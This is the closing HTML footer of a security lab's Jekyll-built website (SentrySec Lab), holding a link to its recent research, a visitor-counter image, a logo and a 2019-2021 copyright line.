                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>